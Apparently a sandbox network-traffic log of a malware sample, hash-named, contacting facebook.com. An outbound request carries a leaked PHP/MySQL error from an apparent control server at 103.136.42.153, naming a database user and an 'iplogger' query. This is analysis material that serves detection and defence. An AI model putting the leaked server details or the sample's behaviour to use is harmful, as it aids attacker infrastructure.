2022-10-07 13:58:41 UTC	153	IN	Data Raw: 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 Data Ascii: hp\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520A
2022-10-07 13:58:41 UTC	155	IN	Data Raw: 6f 72 55 6e 63 61 75 67 68 74 45 72 72 6f 72 73 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 48 61 72 64 77 61 72 65 43 53 53 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 48 61 6e 64 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 6f 5c 2f 22 2c 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 63 4d 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 6f 5c 2f 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 63 4d 22 7d 2c 22 65 6e 5f 55 53 22 2c 74 72 75 65 2c 22 46 61 63 65 62 6f 6f 6b 22 5d 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 Data Ascii: orUncaughtErrors",[],[]],["HardwareCSS","init",[],[]],["WebCookieLocaleSelectorHandler","init",["__elem_ec77afbd_0_0_o\/","__inst_02182015_0_0_cM"],[{"__m":"__elem_ec77afbd_0_0_o\/"},{"__m":"__inst_02182015_0_0_cM"},"en_US",true,"Facebook"]],["__inst_ead1
2022-10-07 13:58:41 UTC	156	IN	Data Raw: 65 6c 64 49 44 22 3a 22 70 61 73 73 22 7d 5d 5d 2c 5b 22 46 6f 63 75 73 4c 69 73 74 65 6e 65 72 22 5d 2c 5b 22 46 6c 69 70 44 69 72 65 63 74 69 6f 6e 4f 6e 4b 65 79 70 72 65 73 73 22 5d 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 63 4d 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 35 61 64 32 34 33 64 5f 30 5f 30 5f 35 35 22 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 31 70 22 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 4e 45 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 4e 45 22 7d 2c 22 5f 39 6e Data Ascii: eldID":"pass"}]],["FocusListener"],["FlipDirectionOnKeypress"],["PageTransitions"],["__inst_02182015_0_0_cM"],["__inst_e5ad243d_0_0_55"],["__inst_1de146dc_0_0_1p"],["CookieAccordion","init",["__elem_a588f507_0_4_NE"],[{"__m":"__elem_a588f507_0_4_NE"},"_9n
2022-10-07 13:58:41 UTC	158	IN	Data Raw: 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 76 2f 6c 2f 30 2c 63 72 6f 73 73 2f 61 65 79 32 41 31 76 59 33 46 6e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 39 2f 6c 2f 30 2c 63 72 6f 73 73 2f 78 6f 49 6a 5a 4c 33 73 4a 6d 4b 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c Data Ascii: ad" href="https://static.xx.fbcdn.net/rsrc.php/v3/yv/l/0,cross/aey2A1vY3Fn.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/xoIjZL3sJmK.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="prel
2022-10-07 13:58:41 UTC	159	IN	Data Raw: 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 76 2f 72 2f 54 43 68 6f 2d 61 43 35 64 4c 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 63 72 4d 65 63 46 72 70 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f Data Ascii: .fbcdn.net/rsrc.php/v3/yv/r/TCho-aC5dLO.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="crMecFrp" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https:/
2022-10-07 13:58:41 UTC	161	IN	Data Raw: 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 6d 78 53 6b 66 38 42 22 2c 22 6f 42 2f 79 58 67 33 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 63 59 55 33 63 33 32 22 2c 22 34 42 47 54 6d 43 37 22 2c 22 56 4b 39 6b 6a 61 74 22 2c 22 44 31 2f 4a 54 6d 54 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 2f 72 4f 30 6c 62 6e 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 73 35 2b 44 36 55 4c 22 2c 22 50 2f 6d 72 35 56 45 22 2c 22 68 49 77 41 32 57 36 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 49 61 52 2f 36 75 50 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 4b 73 62 52 73 33 75 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 59 74 Data Ascii: ","mRpDwmd","n6W4xMH","h3ZzAmG","mxSkf8B","oB/yXg3","dAxX0jj","cYU3c32","4BGTmC7","VK9kjat","D1/JTmT","Z2GjVu9","/rO0lbn","lWOvGTa","s5+D6UL","P/mr5VE","hIwA2W6","diogVau","IaR/6uP","X9nr65a","KsbRs3u","Fn3rAl7","RPLH8jg","zPLgIGT","srPmdt4","R5w1rCJ","Yt
2022-10-07 13:58:41 UTC	162	IN	Data Raw: 61 6c 73 65 2c 69 73 58 52 65 71 75 65 73 74 43 6f 6e 66 69 67 45 6e 61 62 6c 65 64 3a 66 61 6c 73 65 2c 61 75 78 69 6c 69 61 72 79 53 65 72 76 69 63 65 49 6e 66 6f 3a 7b 7d 2c 74 65 73 74 50 61 74 68 3a 6e 75 6c 6c 2c 6f 72 69 67 69 6e 48 6f 73 74 3a 6e 75 6c 6c 7d 2c 35 33 33 32 5d 2c 5b 22 63 72 3a 31 36 34 32 37 39 37 22 2c 5b 22 42 61 6e 7a 61 69 42 61 73 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 61 6e 7a 61 69 42 61 73 65 22 2c 22 41 61 30 68 5a 53 52 35 47 39 66 35 32 65 76 6a 35 32 7a 59 63 59 56 52 4e 61 34 5f 6c 30 51 59 39 65 33 34 44 78 43 47 4c 59 54 78 52 5f 32 64 62 74 6e 48 6d 55 4b 63 63 36 49 31 49 44 67 54 78 65 53 6d 2d 71 47 41 39 72 61 4a 4d 56 63 47 65 4e 4b 55 48 76 46 38 42 51 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 34 35 38 31 Data Ascii: alse,isXRequestConfigEnabled:false,auxiliaryServiceInfo:{},testPath:null,originHost:null},5332],["cr:1642797",["BanzaiBase"],{__rc:["BanzaiBase","Aa0hZSR5G9f52evj52zYcYVRNa4_l0QY9e34DxCGLYTxR_2dbtnHmUKcc6I1IDgTxeSm-qGA9raJMVcGeNKUHvF8BQY"]},-1],["cr:14581
2022-10-07 13:58:41 UTC	163	IN	Data Raw: 6e 48 6d 55 4b 63 63 36 49 31 49 44 67 54 78 65 53 6d 2d 71 47 41 39 72 61 4a 4d 56 63 47 65 4e 4b 55 48 76 46 38 42 51 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 32 30 32 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 68 5a 32 4d 74 4d 4a 2d 39 72 76 41 4f 7a 4e 73 72 4a 54 79 74 5f 70 74 6b 50 47 4e 33 2d 79 47 73 31 35 59 69 55 32 78 54 42 56 48 38 56 4a 45 44 79 59 6a 50 4e 39 4d 61 77 79 4e 4d 67 78 4b 31 52 77 47 6a 64 4c 6c 4a 6d 58 6a 4c 57 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 37 31 34 37 33 22 2c 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 41 61 30 68 5a 53 52 35 47 39 66 35 32 65 76 6a 35 Data Ascii: nHmUKcc6I1IDgTxeSm-qGA9raJMVcGeNKUHvF8BQY"]},-1],["cr:11202",[],{__rc:[null,"Aa3hZ2MtMJ-9rvAOzNsrJTyt_ptkPGN3-yGs15YiU2xTBVH8VJEDyYjPN9MawyNMgxK1RwGjdLlJmXjLWg"]},-1],["cr:971473",["LayerHideOnTransition"],{__rc:["LayerHideOnTransition","Aa0hZSR5G9f52evj5
2022-10-07 13:58:41 UTC	165	IN	Data Raw: 73 69 63 2e 70 72 6f 64 2d 6f 72 2d 70 72 6f 66 69 6c 69 6e 67 22 2c 22 41 61 33 68 5a 32 4d 74 4d 4a 2d 39 72 76 41 4f 7a 4e 73 72 4a 54 79 74 5f 70 74 6b 50 47 4e 33 2d 79 47 73 31 35 59 69 55 32 78 54 42 56 48 38 56 4a 45 44 79 59 6a 50 4e 39 4d 61 77 79 4e 4d 67 78 4b 31 52 77 47 6a 64 4c 6c 4a 6d 58 6a 4c 57 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 32 36 38 33 22 2c 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 22 2c 22 41 61 30 72 51 49 4c 59 5f 34 47 69 69 35 7a 73 44 63 47 4e 6b 67 46 43 2d 76 45 58 51 31 41 2d 36 38 4c 55 6f 4d 71 58 39 55 6e 47 74 59 61 4f 76 6d 46 57 6d 51 2d 66 39 2d 30 47 2d 64 7a 43 6a 5f 6c 6d 4a 59 32 5a 32 2d 63 50 62 41 52 67 4d 43 7a 66 56 35 73 63 65 58 6a 77 Data Ascii: sic.prod-or-profiling","Aa3hZ2MtMJ-9rvAOzNsrJTyt_ptkPGN3-yGs15YiU2xTBVH8VJEDyYjPN9MawyNMgxK1RwGjdLlJmXjLWg"]},-1],["cr:2683",["warningBlue"],{__rc:["warningBlue","Aa0rQILY_4Gii5zsDcGNkgFC-vEXQ1A-68LUoMqX9UnGtYaOvmFWmQ-f9-0G-dzCj_lmJY2Z2-cPbARgMCzfV5sceXjw
2022-10-07 13:58:41 UTC	166	IN	Data Raw: 45 42 6a 6b 4a 36 39 59 73 45 56 32 66 76 51 72 51 68 62 51 6a 4a 33 6f 6b 5a 36 78 52 33 69 32 5a 75 56 47 79 61 74 66 56 44 6f 6e 4c 6f 5f 4f 56 66 5f 31 53 65 37 67 47 69 31 4e 56 6f 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 36 33 34 36 31 36 22 2c 5b 22 55 73 65 72 41 63 74 69 76 69 74 79 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 55 73 65 72 41 63 74 69 76 69 74 79 42 6c 75 65 22 2c 22 41 61 30 68 5a 53 52 35 47 39 66 35 32 65 76 6a 35 32 7a 59 63 59 56 52 4e 61 34 5f 6c 30 51 59 39 65 33 34 44 78 43 47 4c 59 54 78 52 5f 32 64 62 74 6e 48 6d 55 4b 63 63 36 49 31 49 44 67 54 78 65 53 6d 2d 71 47 41 39 72 61 4a 4d 56 63 47 65 4e 4b 55 48 76 46 38 42 51 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 34 34 31 38 30 22 2c 5b 22 54 69 6d 65 53 70 65 6e 74 Data Ascii: EBjkJ69YsEV2fvQrQhbQjJ3okZ6xR3i2ZuVGyatfVDonLo_OVf_1Se7gGi1NVo"]},-1],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa0hZSR5G9f52evj52zYcYVRNa4_l0QY9e34DxCGLYTxR_2dbtnHmUKcc6I1IDgTxeSm-qGA9raJMVcGeNKUHvF8BQY"]},-1],["cr:844180",["TimeSpent
2022-10-07 13:58:41 UTC	168	IN	Data Raw: 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 25 32 30 28 75 73 69 6e 67 25 32 30 Data Ascii: ven%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20
2022-10-07 13:58:41 UTC	169	IN	Data Raw: 5a 74 75 22 2c 22 2f 6f 35 59 76 4f 32 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 47 44 70 76 74 4b 33 22 2c 22 64 48 73 4a 51 36 79 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 63 59 55 33 63 33 32 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 6e 36 57 34 78 4d 48 22 5d 7d 2c 62 65 3a 31 7d 2c 52 65 71 75 65 73 74 53 74 72 65 61 6d 43 6f 6d 6d 6f 6e 52 65 71 75 65 73 74 53 74 72 65 61 6d 43 6f 6d 6d 6f 6e 54 79 70 65 73 3a 7b 72 3a 5b 22 59 6b 74 6b 2f 52 55 22 5d 2c 62 65 3a 31 7d 7d 7d 7d 2c 61 6c 6c 52 65 73 6f 75 72 63 65 73 3a 5b 22 68 4b 59 30 51 4b 54 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 2f 6f 35 59 76 4f 32 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 47 70 51 46 42 77 4c 22 2c 22 76 47 74 32 6d 78 7a 22 2c Data Ascii: Ztu","/o5YvO2","dAxX0jj","GDpvtK3","dHsJQ6y","hKY0QKT","BIylKC4","cYU3c32","RPLH8jg","n6W4xMH"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Yktk/RU"],be:1}}}},allResources:["hKY0QKT","8zbEZtu","/o5YvO2","RPLH8jg","n6W4xMH","GpQFBwL","vGt2mxz",

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49705	157.240.20.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 13:58:46 UTC	170	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 13:58:46 UTC	171	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: nY3CGGaNRMmocoszbn06QMB7yvVCrwf6I4Zv0iqjbqhykcyUpUYIxNQeFXGT3zs1RiqXoN+xK6Hx1EZ9udpbbA== Date: Fri, 07 Oct 2022 13:58:46 GMT Priority: u=3,i Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 13:58:46 UTC	172	IN	Data Raw: 33 36 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 57 30 4f 78 34 53 66 62 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 Data Ascii: 3649<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="W0Ox4Sfb">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requi
2022-10-07 13:58:46 UTC	173	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 30 4f 78 34 53 66 62 22 3e 3c 2f 73 74 79 Data Ascii: function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="W0Ox4Sfb"></sty
2022-10-07 13:58:46 UTC	174	IN	Data Raw: 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c 69 Data Ascii: b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><li
2022-10-07 13:58:46 UTC	176	IN	Data Raw: 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 Data Ascii: %23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886b
2022-10-07 13:58:46 UTC	177	IN	Data Raw: 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 Data Ascii: 